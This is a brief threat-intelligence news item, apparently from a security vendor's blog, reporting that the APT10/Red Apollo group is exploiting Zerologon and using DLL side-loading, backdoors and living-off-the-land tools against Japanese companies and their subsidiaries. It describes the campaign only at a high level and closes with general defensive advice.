A Chinese cyberespionage group known as Red Apollo or APT 10 has been noticed to be active again and found to be abusing the Windows Zerologon vulnerability. Some Japanese companies and subsidiaries are being targeted by this APT group. These companies belong to multiple industry sectors located in 17 regions worldwide.
Attackers have been running this malicious campaign from October last year to October 2020, mostly using DLL side-loading with the Hartip backdoor being employed by the threat actors.
- Following the exploitation of vulnerable devices, to gain full control over an entire domain, attackers are now using Zerologon exploits to steal domain credentials.
- Custom loaders are used to deliver payloads on all of the targets’ networks. Additionally, living-off-the-land tools such as Certutil, Adfind, Csvde, Ntdsutil, WMIExec, and Powershell, along with obfuscation techniques, as well as the QuasarRAT malware are used.
- The time spent by threat actors in compromised networks varied greatly ranging from days to months.
- In certain cases, they remained in hiding within their victim’s networks for more than a year displaying the sophistication and capabilities of the attackers.
It has been noticed that targets based in North America, South, and East-Asia are constantly being targeted by China-based attackers.
Other recent attacks –
- According to the FBI, last month US computer networks involving those in the national defense were targeted by Chinese state-sponsored hackers.
- In another case, networks in the government sector in Southeast Asia were targeted by a complex espionage attack by leveraging a complete arsenal of droppers, backdoors, and other tools, including Chinoxy backdoor, PcShare RAT, and FunnyDream backdoor binaries.
It is quite evident that this Chinese cyberespionage group has come alive again with more sophistication than before. Consequently, our internal experts suggest implementing and developing appropriate prevention, detection, and mitigation strategies. In addition, review network perimeter to identify any ongoing suspicious activity.
To read more, please check eScan Blog